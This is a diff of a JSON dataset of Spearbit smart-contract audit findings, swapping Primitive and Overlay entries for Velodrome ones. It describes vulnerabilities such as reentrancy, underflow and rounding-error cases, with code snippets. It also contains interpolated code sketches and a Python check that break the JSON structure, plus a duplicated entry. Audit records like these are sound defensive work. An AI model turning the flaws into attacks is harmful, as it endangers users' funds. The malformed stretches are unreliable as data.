pos.tokensOwedQuote -= claimedQuotes.safeCastTo128(); L376 Consider using the pool object (if it remains as a storage object) instead of pools[args.poolId]. L444:L445 The following two instructions can be grouped into one: output = args.output; output = output.scaleToWad(... L436:L443 The internalBalance variable can be discarded, as it is used only within the input assignment: uint256 internalBalance = getBalance( msg.sender, _state.sell ? pool.pair.tokenAsset : pool.pair.tokenQuote ); input = args.useMax == 1 ? internalBalance : args.input; input = input.scaleToWad( _state.sell ? pool.pair.decimalsAsset : pool.pair.decimalsQuote ); L808 Assuming that the swap instruction will be one of the most used instructions, it might be worth moving it to the first if condition to save gas. L409 The if (args.input == 0) revert ZeroInput(); can be removed, as it will result in iteration.input being zero and reverting on L457.", + "title": "Use a bitmap to store nudge proposals for each epoch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The usage of a bitmap implementation for boolean values can save a significant amount of gas. The proposals variable can be indexed by each epoch, which should only increment once per week.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "Incomplete NatSpec comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Throughout the IPortfolio.sol interface, various NatSpec comments are missing or incomplete", + "title": "isApproved function optimization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because settings are all known, you could do an if-check in memory rather than in storage, by validating the fallback settings first. The recommended implementation will become cheaper for the base case and negligibly more expensive (~10s of gas) in other cases.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "Inaccurate Comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "These comments are inaccurate.
[1] The hex value on this line translates to v0.1.0-beta instead of v1.0.0-beta. [2] computeTau returns either the time until pool maturity, or zero if the pool is already expired. [3] These comments do not properly account for the two-byte offset from the start of the array (in L94, only in the endpoint of the slice).", + "title": "Use calldata instead of memory to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Using calldata avoids copying the value into memory, reducing gas cost.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "Check for priorityFee should have its own custom error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The check for invalid priorityFee within the checkParameters function uses the same custom error as the one for fee. This could lead to confusion in the error output.", + "title": "Cache store variables when used multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Storage loads are very expensive compared to memory loads; storage values that are read multiple times should be cached to avoid repeated storage loads. The SinkManager contract uses the storage variable ownedTokenId multiple times.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "Unclear @dev comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "This comment is misleading. It implies that cache is used to \"check\" state while it in fact changes it.", + "title": "Add immutable to variable that don't change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Using immutable for variables that do not change helps to save gas. Immutable variables do not occupy a storage slot when compiled; they are saved inside the contract bytecode.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "Unused custom error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Unused error: error AlreadySettled();", + "title": "Use Custom Errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "As one can see here: \"there is a convenient and gas-efficient way to explain to users why an operation failed through the use of custom errors. Until now, you could already use strings to give more information about failures (e.g., revert(\"Insufficient funds.\");), but they are rather expensive, especially when it comes to deploy cost, and it is difficult to use dynamic information in them.\"", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "Use named constants", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The decodeSwap function compares a value against the constant 6. This value indicates the SWAP_ASSET constant. sellAsset := eq(6, and(0x0F, byte(0, value)))"
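A sketch of the suggested change (the constant name is taken from the finding; the surrounding assembly context is abbreviated):

uint8 internal constant SWAP_ASSET = 0x06;

// ...
assembly {
    // Compare against the named constant instead of the magic number 6.
    sellAsset := eq(SWAP_ASSET, and(0x0F, byte(0, value)))
}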
, + "title": "Cache array length outside of loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "If not cached, the solidity compiler will always read the length of the array during each iteration. That is, if it is a storage array, this is an extra sload operation (100 additional extra gas for each iteration except for the first) and if it is a memory array, this is an extra mload operation (3 additional gas for each iteration except for the first).", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Gas Optimization" ] }, { - "title": "scaleFromWadUp and scaleFromWadUpSigned can underflow", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The scaleFromWadUp and scaleFromWadUpSigned will underflow if the amountWad parameter is 0 because they perform an unchecked subtraction on it: outputDec := add(div(sub(amountWad, 1), factor), 1) // ((a-1) / b) + 1", + "title": "Withdrawing from a managed veNFT locks the user's veNFT for the maximum amount of time", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "A user may deposit their veNFT through the depositManaged() function with any unlock time value. However, upon withdrawing, the unlock time is automatically configured to (block.timestamp + MAXTIME / WEEK) * WEEK. This is poor UX and it does not give users much control over the expiry time of their veNFT.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "AssemblyLib.pack does not clear lowers upper bits", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The pack function packs the 4 lower bits of two bytes into a single byte. If the lower parameter has dirty upper bits, they will be mixed with the higher byte and be set on the final return value.", + "title": "veNFT split functionality can not be disabled", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Once split functionality has been enabled via enableSplitForAll(), it is not possible to disable this feature in the future. It does not pose any additional risk to have it disabled once users have already split their veNFTs, because the protocol allows for these locked amounts to be readily withdrawn upon expiry.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "AssemblyLib.toBytes8/16 functions assumes a max raw length of 16", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The toBytes16 function only works if the length of the bytes raw parameter is at most 16 because of the unchecked subtraction: let shift := mul(sub(16, mload(raw)), 8) The same issue exists for the toBytes8 function.", + "title": "Anyone can notify the FeesVotingReward contract of new rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "While the BribeVotingReward contract intends to allow bribes from anyone, the FeesVotingReward contract is designed to receive fees from just the Gauge contract. This is inconsistent with other reward contracts like LockedManagedReward."
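A sketch of the missing restriction (hypothetical guard; the paired gauge address is assumed to be recorded at deployment, and _notifyRewardAmount stands in for the internal accounting):

address public immutable gauge;

function notifyRewardAmount(address token, uint256 amount) external {
    require(msg.sender == gauge, \"not gauge\"); // only the paired Gauge may notify fees
    _notifyRewardAmount(msg.sender, token, amount);
}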
, "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "PortfolioLib.maturity returns wrong value for perpetual pools", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "A pool can be a perpetual pool that is modeled as a pool with a time to maturity always set to 1 year in the computeTau. However, the maturity function does not return this same maturity. This currently isn't a problem, as maturity is only called from computeTau in case it is not a perpetual pool.", + "title": "Missing check in merge if the _to NFT has voted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The merge() function is used to combine a _from VeNFT into a _to veNFT. It starts with a check on whether the _from VeNFT has voted or not. However, it doesn't check if the _to VeNFT has voted or not. This will cause the user to have less voting power, leaving rewards and/or emissions on the table, if they don't call poke() || reset(). Although this would only be an issue for an unaware user, an aware user would still have to waste gas on either of the following: 1. An extra call to poke() || reset(). 2. Vote with the _to veNFT and then call merge().", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "_createPool has incomplete NatSpec and event args", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The _createPool function contains incomplete NatSpec specifications. Furthermore, the event emitted by this function can be improved by adding more arguments.", + "title": "Ratio of invariant _k to totalSupply of the AMM pool may temporarily decrease", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The burn function directly sends the reserve pro-rated to the liquidity token. This is a simple and elegant way. Nevertheless, two special features of the current AMM would lead to a weird situation: 1. The fee of the AMM pool is sent to the fee contract instead of being absorbed into the pool; 2. The stable pool's curve x^3y + y^3x has a larger rounding error compared to uni-v2's constant product formula. The invariant K in a stable pool can decrease temporarily when a user performs certain actions like minting a token, doing a swap, and withdrawing liquidity. This means that the ratio of K to the total supply of the pool is not monotonically increasing. In most cases, this temporary decrease is negligible and the ratio of K to the total supply of the pool will eventually increase again. However, the ratio of K to the total supply is an important metric for calculating the value of LP tokens, which are used in many protocols. If these protocols are not aware of the temporary decrease in the K value, they may suffer from serious issues (e.g. overflow). The root cause of this issue is that there are always rounding errors when using \"balance\" to calculate the invariant k, and sometimes the rounding error is larger. If an LP is minted when the rounding error is small (the ratio of amount to k is small) and withdrawn when the rounding error is large (the ratio of amount to k is large), the total invariant decreases. We can find a counter-example where the invariant decreases.
function testRoundingErrorAttack(uint swapAmount) public { // The counter-example: swapAmount = 52800410888861351333 vm.assume(swapAmount < 100_000_000 ether); vm.assume(swapAmount > 10 ether); uint reserveA = 10 ether; uint reserveB = 10 ether; uint initialK = _k(reserveA, reserveB); reserveA *= 2; reserveB *= 2; uint tempK = _k(reserveA, reserveB); reserveB -= _getAmountOut(swapAmount, token0, reserveA, reserveB); reserveA += swapAmount; vm.assume(tempK <= _k(reserveA, reserveB)); reserveA -= reserveA / 2; reserveB -= reserveB / 2; require(_k(reserveA, reserveB) > initialK, \"Rounding error attack!\"); }", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "_liquidityPolicy is cast to a uint8 but it should be a uint16", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "During _createPool the pool curve parameters are set. One of them is the jit parameter, which is a uint16. It can be assigned the default value of _liquidityPolicy, but it is cast to a uint8. If the _liquidityPolicy constant is ever changed to a value greater than type(uint8).max, a wrong jit value will be assigned.", + "title": "Inconsistent check for adding value to a lock", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "depositFor allows anyone to add value to an existing lock. However, increaseAmount, which for NORMAL locks is idempotent, has a check to only allow an approved spender or the owner to increase the amount.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Update _feeSavingEffects documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The _feeSavingEffects documentation states: @return bool True if the fees were saved in the position's owed tokens instead of re-invested.", + "title": "Privileged actors are incentivized to front-run each other", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Privileged actors are incentivized to front-run each other and vote at the last second. Because of the FIFS OP sequencer, managers will try to vote exactly at the penultimate block in order to maximize their options (voting can only be done once).", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Document checkInvariant and resolve confusing naming", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The checkInvariant function's return values are undocumented and the variable names used are confusing.", + "title": "First nudge propose must happen one epoch before tail is set to true", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because you can only propose a nudge one epoch in advance, the first propose call will need to happen in the last epoch in which tail is set to false. While the transaction simulation will fail for execute, the EpochGovernor.propose math will make it so that the first proposal has to be initiated an epoch before in order to be executable on the first tail epoch.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Token amounts are in wrong decimals if useMax parameter is used",
- "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The allocate and swap functions have a useMax parameter that sets the token amounts to be used to the net balance of the contract. This net balance is the return value of a getNetBalance call, which is in token decimals. The code that follows (getPoolMaxLiquidity for allocate, iteration.input for swap) expects these amounts to be in WAD units. Using this parameter with tokens that don't have 18 decimals does not work correctly. The actual tokens used will be far lower than the expected amount to be used, which will lead to user loss as the tokens remain in the contract after the action.", + "title": "Missing emit important events", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The contracts that change or create sensitive information should emit an event.", "labels": [ "Spearbit", - "Primitive", - "Severity: High Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "getAmountOut underestimates outputs leading to losses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "When computing the output, the getAmountOut performs a bisection. However, this bisection returns any root of the function, not the lowest root. As the invariant is far from being strictly monotonic in R_x, it contains many neighbouring roots (> 2e9 in the example) and it's important to return the lowest root, corresponding to the lowest nextDependent, i.e., it leads to a larger output amount amountOut = prevDependent - nextDependent. Users using this function to estimate their outputs can incur significant losses. Example: Calling getAmountOut(poolId, false, 1, 0, address(0)) with the pool configuration in the example will return amtOut = 123695775, whereas the real max possible amtOut for that swap is 33x higher at 4089008108. The core issue is that the invariant is not strictly monotonic: invariant(R_x, R_y) = invariant(R_x + 2_852_050_358, R_y), so there are many neighbouring roots for the pool configuration: function test_eval() public { uint128 R_y = 56075575; uint128 R_x = 477959654248878758; uint128 stk = 117322822; uint128 vol = 406600000000000000; uint128 tau = 2332800; int256 prev = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); // this is the actual dependent that still satisfies the invariant R_x -= 2_852_050_358; int256 post = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); console2.log(\"prev: %s\", prev); console2.log(\"post: %s\", post); assertEq(post, prev); assertEq(post, 0); }", + "title": "Marginal rounding errors when using small values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It may be helpful to encourage end users to use BPS or higher denominations for weights when dealing with multiple gauges to keep precision high.
Due to widespread usage of the _vote function throughout the codebase and in forks, it may be best to suggest this in documentation to avoid reverts.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "getAmountOut Calculates an Output Value That Sets the Invariant to Zero, Instead of Preserving Its Value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The swap function enforces that the pool's invariant value does not decrease; however, the getAmountOut function computes an expected swap output based on setting the pool's invariant to zero, which is only equivalent if the initial value of the invariant was already zero--which will generally not be the case as fees accrue and time passes. This is because in computeSwapStep (invoked by getAmountOut [1]), the function (optimizeDependentReserve) passed [2] to the bisection algorithm for root finding returns just the invariant evaluated on the current arguments [3], instead of the difference between the evaluated and original invariant. As a consequence, getAmountOut will return an inaccurate result when the starting value of the invariant is non-zero, leading to either disadvantageous swaps or swaps that revert, depending on whether the current pool invariant value is less than or greater than zero.", + "title": "Prefer to use nonReentrant on external functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It may be best to use nonReentrant on the external functions rather than the internal ones. Vote, for example, is not protected because only the internal function is.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "getAmountOut Does Not Adjust The Pool's Reserve Values Based on the liquidityDelta Parameter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The liquidityDelta parameter allows a caller to adjust the liquidity in a pool before simulating a swap. However, corresponding adjustments are not made to the per-pool reserves, virtualX and virtualY. This makes the reserve-to-liquidity ratios used in the calculations incorrect, leading to inaccurate results (or potentially reverts if the invalid values fall outside of allowed ranges). Use of the inaccurate swap outputs could lead either to swaps at bad prices or swaps that revert unexpectedly.", + "title": "Redundant variable update", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In notifyRewardAmount the variable lastUpdateTime is updated twice.", "labels": [ "Spearbit", - "Primitive", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Bisection always uses max iterations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The current bisection algorithm chooses the mid point as root = (lower + upper) / 2; and the bisection terminates if either upper - lower < 0 or maxIterations is reached. Given upper >= lower throughout the code, it's easy to see that upper - lower < 0 can never be satisfied. The bisection will always use the max iterations.
However, even with an epsilon of 1 it can happen that the mid point root is the same as the lower bound if upper = lower + 1. The if (output * lowerOutput < 0) condition will never be satisfied and the else case will always run, setting the lower bound to itself. The bisection will keep iterating with the same lower and upper bounds until max iterations are reached.", + "title": "Turn logic into internal function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In the Gauge contract, the logic to update rewardPerTokenStored, lastUpdateTime, rewards, and userRewardsPerTokenPaid can be converted to an internal function for simplicity.", "labels": [ "Spearbit", - "Primitive", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Potential reentrancy in claimFees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The contract performs all transfers in the _settlement function and therefore _settlement can call back to the user for reentrant tokens. To avoid reentrancy issues the _preLock() modifier implements a reentrancy check, but only if the called action is not happening during a multicall execution: function _preLock() private { // Reverts if the lock was already set and the current call is not a multicall. if (_locked != 1 && !_currentMulticall) { revert InvalidReentrancy(); } _locked = 2; } Therefore, multicalls are not protected against reentrancy, and _settlement should only be executed once, at the end of the original multicall. However, the claimFee function can be called through a multicall by the protocol owner and it calls _settlement even if the execution is part of a multicall.", + "title": "Add extra slippages on client-side when dependent paths are used in generateZapInParams", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "generateZapInParams is a helper function in Router that calculates the parameters for zapIn. If there's a duplicate pair in RoutesA and RoutesB, the value calculated here would be off. For example, the optimal path to swap dai into the usdc/velo pair would likely have dai/eth in both routesA and routesB. When the user uses this param to call zapIn, it executes two swaps: dai -> eth -> usdc, and dai -> eth -> velo. As the price of dai/eth is changed after the first swap, the second swap would have a slightly worse price. The zapIn will likely revert as it does not meet the min token return.", "labels": [ "Spearbit", - "Primitive", - "Severity: Low Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Bisection can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The Bisection algorithm tries to find a root of the monotonic function. Evaluating the expensive invariant function at the lower point on each iteration can be avoided by caching the output function value whenever a new lower bound is set.", + "title": "Unnecessary skim in router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The pair contract absorbs any extra tokens after swap, mint, and burn.
Triggering Skim after burn/mint would not return extra tokens.", "labels": [ "Spearbit", - "Primitive", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Pool existence check in swap should happen earlier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The swap function makes use of the pool pair's tokens to scale the input decimals before it checks if the pool even exists.", + "title": "Overflow is not desired and can lead to loss of funds in Solidity 8.0.0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In Solidity 0.8.0, uint overflow reverts by default. //Pair.sol#L235-L239 uint256 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) { reserve0CumulativeLast += _reserve0 * timeElapsed; reserve1CumulativeLast += _reserve1 * timeElapsed; } reserve0CumulativeLast += _reserve0 * timeElapsed; This calculation will overflow and DOS the pair if _reserve0 is too large. As a result, the pool should not support high-decimals tokens.", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Pool creation in test uses wrong duration and volatility", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The second path with pairId != 0 in HelperConfigsLib's pool creation calls the createPool method with the volatility and duration parameters swapped, leading to wrong pool creations used in tests that use this path.", + "title": "Unnecessary casting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "_totalWeight is already declared as uint256", "labels": [ "Spearbit", - "Primitive", + "Velodrome", "Severity: Informational" ] }, { - "title": "Use unchecked in TickMath.sol and FullMath.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Uniswap math libraries rely on wrapping behaviour for conducting arithmetic operations. Solidity version 0.8.0 introduced checked arithmetic by default, where operations that cause an overflow would revert. Since the code was adapted from Uniswap and written in Solidity version 0.7.6, these arithmetic operations should be wrapped in an unchecked block.", + "title": "Refactor retrieve current epoch into library", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Could refactor to a library function to retrieve the current epoch", "labels": [ "Spearbit", - "Overlay", - "Severity: High Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Liquidation might fail", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The liquidate() function checks if a position can be liquidated and, via liquidatable(), uses maintenanceMarginFraction as a factor to determine if enough value is left. However, in the rest of the liquidate() function, liquidationFeeRate is used to determine the fee paid to the liquidator. It is not necessarily true that enough value is left for the fee, as two different ways are used to calculate this, which means that liquidations might fail.
This is classified as high risk because liquidation is an essential functionality of Overlay. contract OverlayV1Market is IOverlayV1Market { function liquidate(address owner, uint256 positionId) external { ... require(pos.liquidatable(..., maintenanceMarginFraction),\"OVLV1:!liquidatable\"); ... uint256 liquidationFee = value.mulDown(liquidationFeeRate); ... ovl.transfer(msg.sender, value - liquidationFee); ovl.transfer(IOverlayV1Factory(factory).feeRecipient(), liquidationFee); } } library Position { function liquidatable(..., uint256 maintenanceMarginFraction) ... { ... uint256 maintenanceMargin = posNotionalInitial.mulUp(maintenanceMarginFraction); can_ = val < maintenanceMargin; } }", + "title": "Add governor permission to sensible functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Some functions that change important variables could add a governor permission check to enable changes. The function setManagedState in VotingEscrow is one where adding governor permission is recommended.", "labels": [ "Spearbit", - "Overlay", - "Severity: High Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Rounding down of snapAccumulator might influence calculations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function transform() lowers snapAccumulator with the following equation: (snapAccumulator * int256(dt)) / int256(snapWindow). During the time that snapAccumulator * dt is smaller than snapWindow this will be rounded down to 0, which means snapAccumulator will stay at the same value. Luckily, dt will eventually reach the value of snapWindow, and by then the value won't be rounded down to 0 any more. Risk lies in calculations diverging from formulas written in the whitepaper. Note: Given medium risk severity because the probability of this happening is high, while impact is likely low. function transform(...) ... { ... snapAccumulator -= (snapAccumulator * int256(dt)) / int256(snapWindow); ... }", + "title": "Simplify check for rounding error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The check of rounding error can be simplified. Instead of using A / B > 0, use A > B.", "labels": [ "Spearbit", - "Overlay", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Verify pool legitimacy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The constructor in OverlayV1UniswapV3Factory.sol and OverlayV1UniswapV3Feed.sol only does a partial check to see if the pool corresponds to the supplied tokens. This is accomplished by calling the pool's functions, but if the pool were to be malicious, it could return any token. Additionally, checks can be bypassed by supplying the same tokens twice. Because the deployFeed() function is permissionless, it is possible to deploy malicious feeds. Luckily, the deployMarket() function is permissioned and prevents malicious markets from being deployed. contract OverlayV1UniswapV3Factory is IOverlayV1UniswapV3FeedFactory, OverlayV1FeedFactory { constructor(address _ovlWethPool, address _ovl, ...)
{ ovlWethPool = _ovlWethPool; // no check on validity of _ovlWethPool here ovl = _ovl; } function deployFeed(address marketPool, address marketBaseToken, address marketQuoteToken, ...) external returns (address feed_) { // Permissionless ... // no check on validity of marketPool here } 5 } contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { constructor( address _marketPool, address _ovlWethPool, address _ovl, address _marketBaseToken, address _marketQuoteToken, ... ) ... { ... address _marketToken0 = IUniswapV3Pool(_marketPool).token0(); // relies on a valid _marketPool address _marketToken1 = IUniswapV3Pool(_marketPool).token1(); require(_marketToken0 == WETH || _marketToken1 == WETH, \"OVLV1Feed: marketToken != WETH\"); marketToken0 = _marketToken0; marketToken1 = _marketToken1; require( _marketToken0 == _marketBaseToken || _marketToken1 == _marketBaseToken, \"OVLV1Feed: marketToken != marketBaseToken\" ); require( _marketToken0 == _marketQuoteToken || _marketToken1 == _marketQuoteToken, \"OVLV1Feed: marketToken != marketQuoteToken\" ); marketBaseToken = _marketBaseToken; // what if _marketBaseToken == _marketQuoteToken == WETH ? marketQuoteToken = _marketQuoteToken; marketBaseAmount = _marketBaseAmount; // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); // relies on a valid ,! _ovlWethPool address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); require( _ovlWethToken0 == WETH || _ovlWethToken1 == WETH, \"OVLV1Feed: ovlWethToken != WETH\" ); require( _ovlWethToken0 == _ovl || _ovlWethToken1 == _ovl, // What if _ovl == WETH ? \"OVLV1Feed: ovlWethToken != OVL\" ); ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; marketPool = _marketPool; ovlWethPool = _ovlWethPool; ovl = _ovl; }", + "title": "Simplify check for rounding error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The rounding-error check can be simplified: instead of using A / B > 0, use A > B.", "labels": [ "Spearbit", - "Overlay", - "Severity: Medium Risk" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Liquidatable positions can be unwound by the owner of the position", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The liquidation function can be front-runned since it does not require any deposits. In particular, the liquidation function can be front-runned by the owner of the position by calling unwind. This effectively means that users can prevent themselves from getting liquidated by watching the mempool and frontrunning calls to their liquidation position by calling unwind. Although this behaviour is similar to liquidations in lending protocols where a borrower can front-run a liquidation by repaying the borrow, the lack of collateral requirements for both unwind and liquidation makes this case special. Note: In practice, transactions for liquidations do not end up in the public mempool and are often sent via private relays such as flashbots. Therefore, a scenario where the user finds out about a liquidatable position by the public mempool is likely not common. However, a similar argument still applies. Note: Overlay also allows the owner of the position to be the liquidator, unlike other protocols like compound.
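On the "Simplify check for rounding error" item above: with truncating integer division (Solidity's /, Python's //) and positive operands, A / B > 0 holds exactly when A >= B, so the division can be dropped entirely; a quick Python check (note the report phrases the replacement as A > B, which differs only in the boundary case A == B):

# For positive integers, (a // b) > 0 is equivalent to a >= b, so the
# rounding-error check does not need the division at all.
for a in range(1, 200):
    for b in range(1, 200):
        assert (a // b > 0) == (a >= b)
print("A / B > 0  <=>  A >= B  for positive integers")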
